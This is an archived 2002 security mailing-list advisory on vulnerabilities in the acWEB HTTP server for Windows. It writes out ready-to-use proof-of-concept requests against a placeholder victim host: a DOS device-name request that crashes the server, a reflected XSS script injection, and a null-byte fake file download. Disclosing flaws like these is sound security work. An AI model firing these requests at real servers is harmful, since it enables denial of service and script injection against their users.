IIL Advisory: Vulnerabilities in acWEB HTTP server

From: DownBload (downbloadat_private)
Date: Wed Sep 25 2002 - 02:08:20 PDT

Next message: Mike Riley: "OpenVMS POP server local vulnerability"

Previous message: Gossi The Dog: "Re: Information Disclosure with Invision Board installation (fwd)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) [ Illegal Instruction Labs Advisory ] [-------------------------------------------------------------------------] Advisory name: Vulnerabilities in acWEB HTTP server Advisory number: 13 Application: acWEB HTTP server Author e-mail: spfat_private Homepage: somewhere on sourceforge Date: 10.09.2002 Impact: DoS, XSS, etc. Tested on: Windows 98 Discovered by: DownBload Mail me @: downbloadat_private ======[ Overview Sourceforge: "acWEB is an OpenSource replacement for MS IIS and other proprietary WEB servers for Windows. Unlike IIS, acWEB is not affected by viruses like CodeRed, Nimda, etc :)." /ME says: acWEB is simple HTTP server for Windows. It is perfect for tiny companies, and for home use. ======[ Problem(s) ===[ Remote DoS First vulnerability which I discovered in acWEB HTTP server was remote DoS. It is possible to crush acWEB (and Windows too) with simple HTTP request: ---cut here--- http://www.victim.com/com2.bat ---cut here--- ===[ XSS a.k.a CSS bug XSS code execution: ---cut here--- http://www.victim.com/%db<script>alert('Illegal%20Instruction%20Labs% 200wnz%20YoU!!!');</script>/ ---cut here--- ===[ Fake file download ---cut here--- http://www.victim.com/|%5chacked.txt%00 ---cut here--- When this request it sent to acWEB HTTP server, acWEB will return: --------------- HTTP/1.0 200 OK Content-Length: 0 Connection: Close Content-Type: application/octet-stream Server: Eserv/3.x --------------- That is fuqn weird, because file 'hacked.txt' don't exist. acWEB HTTP server will send us 'hacked.txt' empty file to download. ======[ Exploit This can be exploited with browser, so I won't write exploit for this...or maybe one day :). ======[ Greetz Greetz goes to #hr.hackers, #ii-labs and #linux <irc.carnet.hr>. Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, Fr1c, phreax, LekaMan, StYx, harlequin, Astral and www.active-security.org (NetZero & Paradox). I'm very sorry if I forgot someone.

Next message: Mike Riley: "OpenVMS POP server local vulnerability"
Previous message: Gossi The Dog: "Re: Information Disclosure with Invision Board installation (fwd)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Sep 25 2002 - 09:30:25 PDT